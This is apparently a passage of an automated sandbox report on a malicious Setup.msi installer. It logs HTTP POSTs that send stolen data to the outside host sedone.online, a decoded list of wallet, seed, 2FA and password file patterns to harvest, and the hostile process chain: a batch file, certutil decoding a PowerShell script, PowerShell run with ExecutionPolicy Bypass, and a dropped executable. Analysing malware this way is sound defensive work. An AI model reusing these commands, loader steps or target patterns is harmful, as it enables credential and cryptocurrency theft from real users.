                                                                                                                                                                                                                                                  2024-12-17 16:29:51 UTC2208INData Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                  Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  24192.168.2.449933116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:30:03 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----4W4EKFCJW4EUAAASR90Z
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 32481
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:30:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 57 34 45 4b 46 43 4a 57 34 45 55 41 41 41 53 52 39 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 34 57 34 45 4b 46 43 4a 57 34 45 55 41 41 41 53 52 39 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 34 57 34 45 4b 46 43 4a 57 34 45 55 41 41 41 53 52 39 30 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------4W4EKFCJW4EUAAASR90ZContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------4W4EKFCJW4EUAAASR90ZContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------4W4EKFCJW4EUAAASR90ZCont
                                                                                                                                                                                                                                                  2024-12-17 16:30:03 UTC16126OUTData Raw: 46 73 61 58 70 6c 51 32 46 73 62 47 4a 68 59 32 74 42 63 6e 4a 68 65 51 41 41 56 51 42 58 5a 48 4e 54 5a 58 52 31 63 45 78 76 5a 30 31 6c 63 33 4e 68 5a 32 56 58 41 46 59 41 56 32 52 7a 55 33 56 69 63 32 4e 79 61 57 4a 6c 52 58 67 41 41 41 4d 41 51 32 39 75 63 33 52 79 64 57 4e 30 55 47 46 79 64 47 6c 68 62 45 31 7a 5a 31 5a 58 41 41 51 41 51 33 56 79 63 6d 56 75 64 45 6c 51 41 46 64 45 55 30 4e 50 55 6b 55 75 5a 47 78 73 41 47 34 45 55 6e 52 73 53 57 35 70 64 46 56 75 61 57 4e 76 5a 47 56 54 64 48 4a 70 62 6d 63 41 41 4a 38 42 54 6e 52 50 63 47 56 75 52 6d 6c 73 5a 51 41 41 62 6e 52 6b 62 47 77 75 5a 47 78 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: FsaXplQ2FsbGJhY2tBcnJheQAAVQBXZHNTZXR1cExvZ01lc3NhZ2VXAFYAV2RzU3Vic2NyaWJlRXgAAAMAQ29uc3RydWN0UGFydGlhbE1zZ1ZXAAQAQ3VycmVudElQAFdEU0NPUkUuZGxsAG4EUnRsSW5pdFVuaWNvZGVTdHJpbmcAAJ8BTnRPcGVuRmlsZQAAbnRkbGwuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:30:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:30:04 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:30:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  25192.168.2.449936116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:30:04 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----MYUKN7900ZU37YMY5FK6
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 4421
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:30:04 UTC4421OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------MYUKN7900ZU37YMY5FK6Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------MYUKN7900ZU37YMY5FK6Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------MYUKN7900ZU37YMY5FK6Cont
                                                                                                                                                                                                                                                  2024-12-17 16:30:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:30:05 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:30:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  26192.168.2.449942116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:30:06 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----16PP890HDJM7QQ1V3OH4
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 2449
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:30:06 UTC2449OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------16PP890HDJM7QQ1V3OH4Cont
                                                                                                                                                                                                                                                  2024-12-17 16:30:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:30:07 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:30:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  27192.168.2.449944116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:30:07 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WTRQIE37YCBIM7Q16XBI
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 6533
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:30:07 UTC6533OUTData Raw: 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------WTRQIE37YCBIM7Q16XBICont
                                                                                                                                                                                                                                                  2024-12-17 16:30:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:30:08 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:30:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:11:28:01
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Setup.msi"
                                                                                                                                                                                                                                                  Imagebase:0x7ff79ff50000
                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:11:28:03
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                  Imagebase:0x7ff79ff50000
                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:11:28:04
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 50B4D686C01703530B412DCED2DB0D4F C
                                                                                                                                                                                                                                                  Imagebase:0x450000
                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:11:28:14
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E4D759A8E406C9ACB7BC72DE0FA3790E
                                                                                                                                                                                                                                                  Imagebase:0x450000
                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Installer\MSI64FB.tmp
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Installer\MSI64FB.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KingSoft\1.bat"
                                                                                                                                                                                                                                                  Imagebase:0x7ff749f40000
                                                                                                                                                                                                                                                  File size:548'192 bytes
                                                                                                                                                                                                                                                  MD5 hash:250DA78FACCE68224B24D0FFAD65CA8E
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" "
                                                                                                                                                                                                                                                  Imagebase:0x7ff7b3350000
                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\certutil.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:certutil -decode -f C:\Users\user\AppData\Local\Temp\11808.ps1 C:\Users\user\AppData\Local\Temp\11808.ps1
                                                                                                                                                                                                                                                  Imagebase:0x7ff689a60000
                                                                                                                                                                                                                                                  File size:1'651'712 bytes
                                                                                                                                                                                                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7a05b0000
                                                                                                                                                                                                                                                  File size:161'280 bytes
                                                                                                                                                                                                                                                  MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:11:28:16
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1"
                                                                                                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                  Start time:11:28:16
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                  Start time:11:28:20
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                                  File size:496'640 bytes
                                                                                                                                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                  Start time:11:28:34
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\putt.exe"
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  File size:978'099 bytes
                                                                                                                                                                                                                                                  MD5 hash:27B18A5E8BDAA950AF93633A821C2BFA
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 37%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                  Start time:11:28:35
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd
                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                  Start time:11:28:35
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
